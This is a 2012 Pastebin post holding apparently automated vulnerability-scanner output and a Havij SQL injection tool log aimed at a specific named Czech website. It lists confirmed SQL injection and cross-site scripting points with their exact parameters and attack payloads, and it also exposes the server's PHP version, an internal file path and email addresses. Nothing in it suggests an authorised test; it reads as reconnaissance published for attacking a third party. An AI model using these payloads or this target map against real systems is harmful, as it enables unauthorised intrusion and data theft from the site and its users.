Advertisement
sroub3k

kdovolal.cz

Apr 29th, 2012
666
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.15 KB | None | 0 0
  1. [High Possibility] SQL Injection
  2.  
  3. Severity : Critical
  4. Confirmation : Confirmed
  5. Vulnerable URL : http://www.kdovolal.cz/index.php?cis=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: cis
  8. Parameter Type: Querystring
  9. Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
  10.  
  11. [High Possibility] SQL Injection
  12.  
  13. Severity : Critical
  14. Confirmation : Confirmed
  15. Vulnerable URL : http://www.kdovolal.cz/index.php
  16. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  17. Parameter Name: cis
  18. Parameter Type: Post
  19. Attack Pattern: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
  20.  
  21. ||| XSS (Cross-site Scripting)
  22.  
  23. Severity : Important
  24. Confirmation : Confirmed
  25. Detection Accuracy :
  26. Vulnerable URL : http://www.kdovolal.cz/index.php?cis=420230231540'"--></style></script><script>alert(0x00000D)</script>
  27. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  28. Parameter Name: cis
  29. Parameter Type: Querystring
  30. Attack Pattern: 420230231540'"--></style></script><script>alert(0x00000D)</script>
  31.  
  32. Severity : Important
  33. Confirmation : Confirmed
  34. Vulnerable URL : http://www.kdovolal.cz/index.php
  35. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  36. Parameter Name: kom
  37. Parameter Type: Post
  38. Attack Pattern: '"--></style></script><script>alert(0x00007D)</script>
  39.  
  40. Severity : Important
  41. Confirmation : Confirmed
  42. Vulnerable URL : http://www.kdovolal.cz/index.php
  43. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  44. Parameter Name: kom
  45. Parameter Type: Post
  46. Attack Pattern: ></script><script>alert(9)</script>
  47.  
  48. Severity : Important
  49. Confirmation : Confirmed
  50. Vulnerable URL : http://www.kdovolal.cz/index.php
  51. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  52. Parameter Name: nick
  53. Parameter Type: Post
  54. Attack Pattern: '"--></style></script><script>alert(0x000080)</script>
  55.  
  56. Severity : Important
  57. Confirmation : Confirmed
  58. Vulnerable URL : http://www.kdovolal.cz/index.php
  59. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  60. Parameter Name: nick
  61. Parameter Type: Post
  62. Attack Pattern: ><iframe onload=alert(9)>
  63.  
  64. ||| Permanent XSS (Cross-site Scripting)
  65.  
  66. Severity : Important
  67. Confirmation : Confirmed
  68. Vulnerable URL : http://www.kdovolal.cz/index.php
  69. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  70. Injection URL: http://www.kdovolal.cz/index.php
  71. Parameter Name: idcislo
  72. Parameter Type: Post
  73. Attack Pattern: '+NSFTW+'
  74.  
  75. ||| [Possible] Permanent Cross-site Scripting
  76.  
  77. Severity : Important
  78. Confirmation : Confirmed
  79. Vulnerable URL : http://www.kdovolal.cz/index.php
  80. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  81. Injection URL: http://www.kdovolal.cz/index.php
  82. Parameter Name: idcislo
  83. Parameter Type: Post
  84. Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
  85.  
  86. ||| Database Error Message
  87.  
  88. Severity : Low
  89. Confirmation : Confirmed
  90. Detection Accuracy :
  91. Vulnerable URL : http://www.kdovolal.cz/index.php?cis='"--></style></script><script>netsparker(0x000005)</script>
  92. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
  93. Parameter Name: cis
  94. Parameter Type: Querystring
  95. Attack Pattern: '"--></style></script><script>netsparker(0x000005)</script>
  96.  
  97. ||| PHP Version Disclosure
  98.  
  99. Severity : Low
  100. Confirmation : Confirmed
  101. Vulnerable URL : http://www.kdovolal.cz/
  102. Vulnerability Classifications: PCI 6.5.6 OWASP A6
  103. Extracted Version: PHP/5.2.17-pl0-gentoo
  104.  
  105. ||| E-mail Address Disclosure
  106.  
  107. Severity : Information
  108. Confirmation : Confirmed
  109. Vulnerable URL : http://www.kdovolal.cz/index.php?cis=420230231540
  110. Found E-mails: info@formicagroup.cz, domains@courlux.ch
  111.  
  112. ||| [Possible] Internal Path Leakage (*nix)
  113.  
  114. Severity : Information
  115. Confirmation : Confirmed
  116. Vulnerable URL : http://www.kdovolal.cz/index.php?cis='"--></style></script><script>netsparker(0x000005)</script>
  117. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  118. Identified Internal Path(s): /mnt/data/accounts/o/oshosan/data/www/wwwkdovolal/index.php
  119. Parameter Name: cis
  120. Parameter Type: Querystring
  121. Attack Pattern: '"--></style></script><script>netsparker(0x000005)</script>
  122.  
  123. ||| Havij 1.15 Pro! - log
  124.  
  125. Analyzing SQLi - http://www.kdovolal.cz/index.php?cis=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)
  126.  
  127. Web Server: nginx/0.7.65
  128. Powered-by: PHP/5.2.17-pl0-gentoo
  129. Keyword Found: mysql_fetch_array():
  130. Injection type is Integer
  131. Keyword corrected: integration
  132. DB Server: MySQL
  133.  
  134. ||| Database name not found!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement